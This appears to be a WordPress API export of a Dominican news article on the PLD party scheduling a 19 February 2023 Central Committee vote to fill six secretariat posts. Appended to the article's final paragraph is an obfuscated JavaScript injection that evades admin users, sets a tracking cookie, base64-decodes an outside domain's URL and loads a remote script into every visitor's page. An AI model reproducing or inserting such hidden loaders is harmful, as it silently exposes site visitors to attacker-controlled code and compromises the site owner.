{"id":13528,"date":"2023-01-21T14:15:15","date_gmt":"2023-01-21T18:15:15","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13528"},"modified":"2023-01-21T14:15:15","modified_gmt":"2023-01-21T18:15:15","slug":"el-pld-escogera-febrero-titulares-de-6-secretarias","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13528","title":{"rendered":"El PLD escoger\u00e1 febrero titulares de 6 secretar\u00edas"},"content":{"rendered":"<div id=\"\" class=\"mmc_ads mmc_ads_solo_escritorio\">\n<div id=\"div-gpt-ad-6467476474210-mmc\" class=\"\" data-google-query-id=\"CK_c9Peh2fwCFRbk4wcdP0gLNg\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_E_Leaderboard_InContent_0__container__\"><\/div>\n<\/div>\n<\/div>\n<p>El Partido de la Liberaci\u00f3n Dominicana (PLD) inform\u00f3 sobre la convocatoria a las y los miembros de su Comit\u00e9 Central para que se proceda a la elecci\u00f3n de las y los titulares de seis secretar\u00edas pendientes, como mandan las resoluciones del IX Congreso Ordinario Jos\u00e9 Joaqu\u00edn Bid\u00f3 Medina.<\/p>\n<p>En rueda de prensa realizada en la Casa Nacional Reinaldo Pared P\u00e9rez del PLD, la comisi\u00f3n designada por el Comit\u00e9 Pol\u00edtico para la organizaci\u00f3n y montaje del proceso de elecci\u00f3n de los titulares de las secretar\u00edas pendientes inform\u00f3 de la convocatoria para el domingo 19 de febrero.<\/p>\n<p>El Comit\u00e9 Pol\u00edtico en la reuni\u00f3n ordinaria del martes 10 de enero de 2023, design\u00f3 a Alejandrina Germ\u00e1n, quien preside la Comisi\u00f3n, Lidio Cadet, Cristina Lizardo, Melanio Paredes, Celenia Vidal y Manuel Saleta, quienes participaron en el encuentro con la prensa este d\u00eda.<\/p>\n<p>\u201cTienen derecho a participar en el proceso de elecci\u00f3n todos los miembros del Comit\u00e9 Central\u201d, explic\u00f3 Alejandrina Germ\u00e1n, en la rueda de prensa.<\/p>\n<p>Se inform\u00f3 tambi\u00e9n que la Comisi\u00f3n ha sostenido ya varias reuniones de trabajo con la participaci\u00f3n de la Secretar\u00eda General en la persona de su titular, Charles Mariotti, en la que por decisi\u00f3n del Comit\u00e9 Pol\u00edtico se ha acordado realizar la elecci\u00f3n el domingo 19 de febrero de 2023 en las instalaciones del Sal\u00f3n Bienvenido Sandoval de la Casa Nacional Reinaldo Pared P\u00e9rez.<\/p>\n<p>\u201cRecordamos que las Secretar\u00edas del Partido de la Liberaci\u00f3n Dominicana son \u00f3rganos de trabajo del Comit\u00e9 Central con misi\u00f3n y responsabilidad definidas en los Estatutos y Reglamentos del Partido\u201d, explic\u00f3 Germ\u00e1n.<\/p>\n<p>Se dijo tambi\u00e9n que todas las Secretar\u00edas est\u00e1n organizadas en el Secretariado del PLD integrado por el Secretariado Org\u00e1nico, el Secretariado Cient\u00edfico-T\u00e9cnico y el Secretariado de Relaciones Partido-Sociedad.<\/p>\n<p><strong>La elecci\u00f3n se har\u00e1 por voto automatizado<\/strong><\/p>\n<p>Germ\u00e1n adelant\u00f3 que la elecci\u00f3n de los titulares de las seis secretar\u00edas pendientes de escoger se har\u00e1 mediante el voto automatizado utilizando las m\u00e1quinas de la Junta Central Electoral a cuyo \u00f3rgano de comicios ya han enviado carta para su facilitaci\u00f3n. Los titulares de secretar\u00edas, pendientes de elecci\u00f3n, deber\u00e1n ser elegidos acorde a su historial pol\u00edtico.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Partido de la Liberaci\u00f3n Dominicana (PLD) inform\u00f3 sobre la convocatoria a las y los miembros de su Comit\u00e9 Central para que se proceda a la elecci\u00f3n de las y los titulares de seis secretar\u00edas pendientes, como mandan las resoluciones del IX Congreso Ordinario Jos\u00e9 Joaqu\u00edn Bid\u00f3 Medina. En rueda de prensa realizada en la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13530,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13528","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13528"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13528\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13530"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}